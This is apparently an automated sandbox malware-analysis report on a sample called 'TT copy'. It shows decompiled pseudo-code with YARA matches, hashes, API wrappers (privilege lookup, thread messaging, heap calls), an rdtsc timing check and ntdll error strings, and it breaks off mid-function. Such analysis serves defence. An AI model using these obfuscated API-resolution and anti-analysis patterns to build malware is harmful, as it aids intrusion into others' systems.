                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: d2b1b0684ae816e35178454e17b12b8f874ddf088f0a5e2ab72b905b6d8ec422
                                                                                                            • Instruction ID: 7d104c3044268d531082426cc3a59a3bf889896d08435ed38f4986b79259df4a
                                                                                                            • Opcode Fuzzy Hash: d2b1b0684ae816e35178454e17b12b8f874ddf088f0a5e2ab72b905b6d8ec422
                                                                                                            • Instruction Fuzzy Hash: E390027131114903D1506199C4447464105E7D1245F51C421A0C14558DC6D598917262
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 9d703acb30a8dd681fd758a43e64fb6afe958e42a2834d8a749068298b41e98f
                                                                                                            • Instruction ID: 460d953c3a14525b02ddbce5bf5ca4b2558676eb373be86b4303074c90136da4
                                                                                                            • Opcode Fuzzy Hash: 9d703acb30a8dd681fd758a43e64fb6afe958e42a2834d8a749068298b41e98f
                                                                                                            • Instruction Fuzzy Hash: 4290027120100D03D1C07199844468A4105E7D1345F91C025A0415654DCA559A5977E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 73eb6a7763255f9e926b609f63404b8e19b68cba36dde456f39dec7303dde0d2
                                                                                                            • Instruction ID: 9e40a6bc7a6fa6fca370ec88cd4995cf85aa35dc0a60af3b5845584be024c12c
                                                                                                            • Opcode Fuzzy Hash: 73eb6a7763255f9e926b609f63404b8e19b68cba36dde456f39dec7303dde0d2
                                                                                                            • Instruction Fuzzy Hash: 3190027120108D03D1506199C44478A4105E7D0345F55C421A4814658DC6D598917261
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E00408EE0(intOrPtr* _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v24;
                                                                                                            				char _v284;
                                                                                                            				char _v804;
                                                                                                            				char _v840;
                                                                                                            				void* __edi;
                                                                                                            				void* _t24;
                                                                                                            				signed int _t31;
                                                                                                            				signed int _t33;
                                                                                                            				void* _t34;
                                                                                                            				signed int _t39;
                                                                                                            				void* _t47;
                                                                                                            				intOrPtr* _t49;
                                                                                                            				void* _t50;
                                                                                                            				void* _t51;
                                                                                                            				void* _t52;
                                                                                                            				void* _t53;
                                                                                                            
                                                                                                            				_t49 = _a4;
                                                                                                            				_t39 = 0; // executed
                                                                                                            				_t24 = E00407220(_t49,  &_v24); // executed
                                                                                                            				_t51 = _t50 + 8;
                                                                                                            				if(_t24 != 0) {
                                                                                                            					_t40 =  &_v840;
                                                                                                            					E00407430( &_v24,  &_v840);
                                                                                                            					_t52 = _t51 + 8;
                                                                                                            					_push(_t47);
                                                                                                            					do {
                                                                                                            						E0041BF40(_t40, _t47,  &_v284, 0x104);
                                                                                                            						_t40 =  &_v804;
                                                                                                            						E0041C5B0( &_v284,  &_v804);
                                                                                                            						_t53 = _t52 + 0x10;
                                                                                                            						_t47 = 0x4f;
                                                                                                            						while(1) {
                                                                                                            							_t31 = E00415A50(_t40, __eflags, E004159F0(_t49, _t47),  &_v284);
                                                                                                            							_t53 = _t53 + 0x10;
                                                                                                            							__eflags = _t31;
                                                                                                            							if(_t31 != 0) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t47 = _t47 + 1;
                                                                                                            							__eflags = _t47 - 0x62;
                                                                                                            							if(_t47 <= 0x62) {
                                                                                                            								continue;
                                                                                                            							} else {
                                                                                                            							}
                                                                                                            							L8:
                                                                                                            							_t33 = E00407460( &_v24,  &_v840);
                                                                                                            							_t52 = _t53 + 8;
                                                                                                            							__eflags = _t33;
                                                                                                            							if(_t33 != 0) {
                                                                                                            								goto L9;
                                                                                                            							}
                                                                                                            							goto L10;
                                                                                                            						}
                                                                                                            						_t9 = _t49 + 0x18; // 0x5e14c483
                                                                                                            						_t40 =  *_t9;
                                                                                                            						_t10 = _t49 + 0x478;
                                                                                                            						 *_t10 =  *(_t49 + 0x478) ^  *_t9;
                                                                                                            						__eflags =  *_t10;
                                                                                                            						_t39 = 1;
                                                                                                            						goto L8;
                                                                                                            						L9:
                                                                                                            						__eflags = _t39;
                                                                                                            					} while (_t39 == 0);
                                                                                                            					L10:
                                                                                                            					_t34 = E004074E0(_t49,  &_v24); // executed
                                                                                                            					__eflags = _t39;
                                                                                                            					if(_t39 == 0) {
                                                                                                            						asm("rdtsc");
                                                                                                            						asm("rdtsc");
                                                                                                            						_v8 = _t34 - 0 + _t34;
                                                                                                            						_t16 = _t49 + 0x560;
                                                                                                            						 *_t16 =  *(_t49 + 0x560) + 0xffffffba;
                                                                                                            						__eflags =  *_t16;
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(_t49 + 0x35)) =  *((intOrPtr*)(_t49 + 0x35)) + _t39;
                                                                                                            					_t20 = _t49 + 0x35; // 0xffff43e8
                                                                                                            					_t21 = _t49 + 0x36;
                                                                                                            					 *_t21 =  *(_t49 + 0x36) +  *_t20 + 1;
                                                                                                            					__eflags =  *_t21;
                                                                                                            					return 1;
                                                                                                            				} else {
                                                                                                            					return _t24;
                                                                                                            				}
                                                                                                            			}





















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b77683e0dbd8a0247fb8733bf576a5c0d80217aef466204e60f60e1be2e19e6b
                                                                                                            • Instruction ID: 2340baedcf14a887bbc52fd8c81bbc6006bef37b01405f1af93c5312fbc60911
                                                                                                            • Opcode Fuzzy Hash: b77683e0dbd8a0247fb8733bf576a5c0d80217aef466204e60f60e1be2e19e6b
                                                                                                            • Instruction Fuzzy Hash: BB214EB2D4010957CB20D6709D41EFB73AC9F50308F44057FF989A3181FA38BB4987A6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 206 407690-4076da call 41bf90 call 41cb70 call 40a150 call 415ab0 215 4076dc-4076ee PostThreadMessageW 206->215 216 40770e-407712 206->216 217 4076f0-40770a call 4098b0 215->217 218 40770d 215->218 217->218 218->216
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E00407690(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                            				char _v67;
                                                                                                            				char _v68;
                                                                                                            				void* _t12;
                                                                                                            				intOrPtr* _t13;
                                                                                                            				int _t14;
                                                                                                            				long _t21;
                                                                                                            				intOrPtr* _t25;
                                                                                                            				void* _t26;
                                                                                                            
                                                                                                            				_v68 = 0;
                                                                                                            				E0041BF90( &_v67, 0, 0x3f);
                                                                                                            				E0041CB70( &_v68, 3);
                                                                                                            				_t12 = E0040A150(_a4 + 0x20,  &_v68); // executed
                                                                                                            				_t13 = E00415AB0(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
                                                                                                            				_t25 = _t13;
                                                                                                            				if(_t25 != 0) {
                                                                                                            					_t21 = _a8;
                                                                                                            					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                                                            					_t32 = _t14;
                                                                                                            					if(_t14 == 0) {
                                                                                                            						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004098B0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                            					}
                                                                                                            					return _t14;
                                                                                                            				}
                                                                                                            				return _t13;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076EA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: MessagePostThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1836367815-0
                                                                                                            • Opcode ID: 33cc3d8823da0739b712ff51f58ed140dca0fa62c918e370dea6f1795a206453
                                                                                                            • Instruction ID: cf4610ad131e10875976ef5617329bc6f707545325555e817fd5ed13dbd1b96a
                                                                                                            • Opcode Fuzzy Hash: 33cc3d8823da0739b712ff51f58ed140dca0fa62c918e370dea6f1795a206453
                                                                                                            • Instruction Fuzzy Hash: C701AC31A8031876E721A6D59C43FFF775C5B45B54F04411AFF04BA2C1D6A8790547EA
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 248 41a784-41a7aa call 41af70 251 41a7af-41a7c4 LookupPrivilegeValueW 248->251
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E0041A784(void* __eax, void* __edi, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, struct _LUID* _a20) {
                                                                                                            				int _t13;
                                                                                                            
                                                                                                            				asm("aaa");
                                                                                                            				0x5573066e();
                                                                                                            				_t10 = _a8;
                                                                                                            				E0041AF70( *((intOrPtr*)(_a8 + 0xa1c)), _t10, _t10 + 0xca8,  *((intOrPtr*)(_a8 + 0xa1c)), 0, 0x46);
                                                                                                            				_t13 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
                                                                                                            				return _t13;
                                                                                                            			}





                                                                                                            APIs
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5D2,0040D5D2,00000041,00000000,?,00409195), ref: 0041A7C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899507212-0
                                                                                                            • Opcode ID: de83731c1455f185018388e51831f11ab45e29bc4ef2835cf13229835070add5
                                                                                                            • Instruction ID: 0a80a0a6db0c697a821da119e56f01a0964c46d907043f619a5c95fd19a3fb1b
                                                                                                            • Opcode Fuzzy Hash: de83731c1455f185018388e51831f11ab45e29bc4ef2835cf13229835070add5
                                                                                                            • Instruction Fuzzy Hash: E7E092B53002086FDF10DFA9CC49EEB3769DF84664F014165FD485B245C931F85586F1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 252 41a5f0-41a621 call 41af70 RtlAllocateHeap
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0041A5F0(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                                            				void* _t10;
                                                                                                            
                                                                                                            				E0041AF70( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
                                                                                                            				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                                                            				return _t10;
                                                                                                            			}





                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00415196,?,0041590F,0041590F,?,00415196,?,?,?,?,?,00000000,00409123,?), ref: 0041A61D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                                                                                            • Instruction ID: a902bd2471d7bf624e41e955d84fd9d1c4f3b9c17a63ece7231003dd0180069e
                                                                                                            • Opcode Fuzzy Hash: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                                                                                            • Instruction Fuzzy Hash: 9DE01AB52002046BDB14DF89DC45E9737ACAF88654F018155BA085B241C530F9108AB5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 255 41a630-41a661 call 41af70 RtlFreeHeap
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0041A630(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                            				char _t10;
                                                                                                            
                                                                                                            				_t3 = _a4 + 0xc90; // 0xc90
                                                                                                            				E0041AF70( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
                                                                                                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                            				return _t10;
                                                                                                            			}





                                                                                                            APIs
                                                                                                            • RtlFreeHeap.NTDLL(00000060,00409123,?,?,00409123,00000060,00000000,00000000,?,?,00409123,?,00000000), ref: 0041A65D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3298025750-0
                                                                                                            • Opcode ID: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                                                                                            • Instruction ID: 7f623aad187af7064e7533bd75938f2c26ac04ae0faa765159e468c107c5f902
                                                                                                            • Opcode Fuzzy Hash: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                                                                                            • Instruction Fuzzy Hash: 6EE012B5200208ABDB14EF89DC49EA737ACAF88764F118159BA085B252C630E9208AB1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 258 41a790-41a7a9 259 41a7af-41a7c4 LookupPrivilegeValueW 258->259 260 41a7aa call 41af70 258->260 260->259
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0041A790(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                            				int _t10;
                                                                                                            
                                                                                                            				E0041AF70( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xca8,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
                                                                                                            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                            				return _t10;
                                                                                                            			}




                                                                                                            0x0041a7aa
                                                                                                            0x0041a7c0
                                                                                                            0x0041a7c4

                                                                                                            APIs
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5D2,0040D5D2,00000041,00000000,?,00409195), ref: 0041A7C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899507212-0
                                                                                                            • Opcode ID: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                                                                                            • Instruction ID: 06e833523edb0ad7648b3b81e76834ac107786c1f02646ed6da31cb29cb4c049
                                                                                                            • Opcode Fuzzy Hash: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                                                                                            • Instruction Fuzzy Hash: E7E01AB52002086BDB10DF89CC45EE737ADAF89664F018155BA0857241C530E8158AB5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0041A670(intOrPtr _a4, int _a8) {
                                                                                                            
                                                                                                            				_t5 = _a4;
                                                                                                            				E0041AF70( *((intOrPtr*)(_a4 + 0xa18)), _t5, _t5 + 0xc98,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x36);
                                                                                                            				ExitProcess(_a8);
                                                                                                            			}



                                                                                                            0x0041a673
                                                                                                            0x0041a68a
                                                                                                            0x0041a698

                                                                                                            APIs
                                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 621844428-0
                                                                                                            • Opcode ID: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                                                                                            • Instruction ID: dff2ff55e3f6aa1d663a1a6c4130c6e76ef78379950388b0c84fd9bb2fd8c8d7
                                                                                                            • Opcode Fuzzy Hash: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                                                                                            • Instruction Fuzzy Hash: F8D017766002187BD620EB99CC89FD777ACDF457A4F0180A5BA0C6B242C934BA5187E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 16%
                                                                                                            			E0041A622(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                            				char _t12;
                                                                                                            
                                                                                                            				_pop(es);
                                                                                                            				asm("loope 0x70");
                                                                                                            				0x4da2c5f4();
                                                                                                            				asm("salc");
                                                                                                            				_t9 = _a4;
                                                                                                            				_t3 = _t9 + 0xc90; // 0xc90
                                                                                                            				E0041AF70( *((intOrPtr*)(_a4 + 0x14)), _t9, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
                                                                                                            				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                            				return _t12;
                                                                                                            			}





                                                                                                            APIs
                                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 621844428-0
                                                                                                            • Opcode ID: dd58d9cb5515d5919411ade5dad0607ecc51d7287a1ae8ea2044e41645b9bd5c
                                                                                                            • Instruction ID: 2c3f141c7e09411b3ec646d9a96b7411eda0e306f012c5d4efef731340dd2862
                                                                                                            • Opcode Fuzzy Hash: dd58d9cb5515d5919411ade5dad0607ecc51d7287a1ae8ea2044e41645b9bd5c
                                                                                                            • Instruction Fuzzy Hash: C0B012D95F20162B903031700C068EF071844D140575B8A6EB31059601B58C833500F3
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 870e714fee660fbf75a3878f46d0ebce51e7cfa72e54322159865bb76412f148
                                                                                                            • Instruction ID: f26de99cae080efd5a0018142d42ddc715abe22816a90ea2438e1acf9644d06e
                                                                                                            • Opcode Fuzzy Hash: 870e714fee660fbf75a3878f46d0ebce51e7cfa72e54322159865bb76412f148
                                                                                                            • Instruction Fuzzy Hash: 9DB09B719014D5C6D651D7E446087177A40BBD4745F56C061D1420641BC778D091F6B5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0111B305
                                                                                                            • *** then kb to get the faulting stack, xrefs: 0111B51C
                                                                                                            • The resource is owned shared by %d threads, xrefs: 0111B37E
                                                                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0111B2F3
                                                                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0111B47D
                                                                                                            • *** enter .exr %p for the exception record, xrefs: 0111B4F1
                                                                                                            • <unknown>, xrefs: 0111B27E, 0111B2D1, 0111B350, 0111B399, 0111B417, 0111B48E
                                                                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 0111B352
                                                                                                            • *** enter .cxr %p for the context, xrefs: 0111B50D
                                                                                                            • The instruction at %p tried to %s , xrefs: 0111B4B6
                                                                                                            • The instruction at %p referenced memory at %p., xrefs: 0111B432
                                                                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0111B53F
                                                                                                            • This failed because of error %Ix., xrefs: 0111B446
                                                                                                            • write to, xrefs: 0111B4A6
                                                                                                            • *** Inpage error in %ws:%s, xrefs: 0111B418
                                                                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0111B39B
                                                                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0111B2DC
                                                                                                            • a NULL pointer, xrefs: 0111B4E0
                                                                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0111B323
                                                                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0111B314
                                                                                                            • Go determine why that thread has not released the critical section., xrefs: 0111B3C5
                                                                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0111B476
                                                                                                            • an invalid address, %p, xrefs: 0111B4CF
                                                                                                            • The critical section is owned by thread %p., xrefs: 0111B3B9
                                                                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 0111B48F
                                                                                                            • read from, xrefs: 0111B4AD, 0111B4B2
                                                                                                            • The resource is owned exclusively by thread %p, xrefs: 0111B374
                                                                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0111B3D6
                                                                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0111B38F
                                                                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0111B484
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                            • API String ID: 0-108210295
                                                                                                            • Opcode ID: 295ba13f4bca2f3ec98db5162f269c7d995b53be25b33cdadc6ea81631e73294
                                                                                                            • Instruction ID: 166b07ad0f85aa543635b65ca730791fd2956693e9e4d9ef49cc9fd2d86d76a5
                                                                                                            • Opcode Fuzzy Hash: 295ba13f4bca2f3ec98db5162f269c7d995b53be25b33cdadc6ea81631e73294
                                                                                                            • Instruction Fuzzy Hash: 2D818530A48210FFDB296B4ADC86EAB7F36EF56B10F01406DFA841F116D3609451CBB6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 44%
                                                                                                            			E01121C06() {
                                                                                                            				signed int _t27;
                                                                                                            				char* _t104;
                                                                                                            				char* _t105;
                                                                                                            				intOrPtr _t113;
                                                                                                            				intOrPtr _t115;
                                                                                                            				intOrPtr _t117;
                                                                                                            				intOrPtr _t119;
                                                                                                            				intOrPtr _t120;
                                                                                                            
                                                                                                            				_t105 = 0x10448a4;
                                                                                                            				_t104 = "HEAP: ";
                                                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                            					_push(_t104);
                                                                                                            					E0106B150();
                                                                                                            				} else {
                                                                                                            					E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            				}
                                                                                                            				_push( *0x115589c);
                                                                                                            				E0106B150("Heap error detected at %p (heap handle %p)\n",  *0x11558a0);
                                                                                                            				_t27 =  *0x1155898; // 0x0
                                                                                                            				if(_t27 <= 0xf) {
                                                                                                            					switch( *((intOrPtr*)(_t27 * 4 +  &M01121E96))) {
                                                                                                            						case 0:
                                                                                                            							_t105 = "heap_failure_internal";
                                                                                                            							goto L21;
                                                                                                            						case 1:
                                                                                                            							goto L21;
                                                                                                            						case 2:
                                                                                                            							goto L21;
                                                                                                            						case 3:
                                                                                                            							goto L21;
                                                                                                            						case 4:
                                                                                                            							goto L21;
                                                                                                            						case 5:
                                                                                                            							goto L21;
                                                                                                            						case 6:
                                                                                                            							goto L21;
                                                                                                            						case 7:
                                                                                                            							goto L21;
                                                                                                            						case 8:
                                                                                                            							goto L21;
                                                                                                            						case 9:
                                                                                                            							goto L21;
                                                                                                            						case 0xa:
                                                                                                            							goto L21;
                                                                                                            						case 0xb:
                                                                                                            							goto L21;
                                                                                                            						case 0xc:
                                                                                                            							goto L21;
                                                                                                            						case 0xd:
                                                                                                            							goto L21;
                                                                                                            						case 0xe:
                                                                                                            							goto L21;
                                                                                                            						case 0xf:
                                                                                                            							goto L21;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L21:
                                                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                            					_push(_t104);
                                                                                                            					E0106B150();
                                                                                                            				} else {
                                                                                                            					E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            				}
                                                                                                            				_push(_t105);
                                                                                                            				E0106B150("Error code: %d - %s\n",  *0x1155898);
                                                                                                            				_t113 =  *0x11558a4; // 0x0
                                                                                                            				if(_t113 != 0) {
                                                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                            						_push(_t104);
                                                                                                            						E0106B150();
                                                                                                            					} else {
                                                                                                            						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            					}
                                                                                                            					E0106B150("Parameter1: %p\n",  *0x11558a4);
                                                                                                            				}
                                                                                                            				_t115 =  *0x11558a8; // 0x0
                                                                                                            				if(_t115 != 0) {
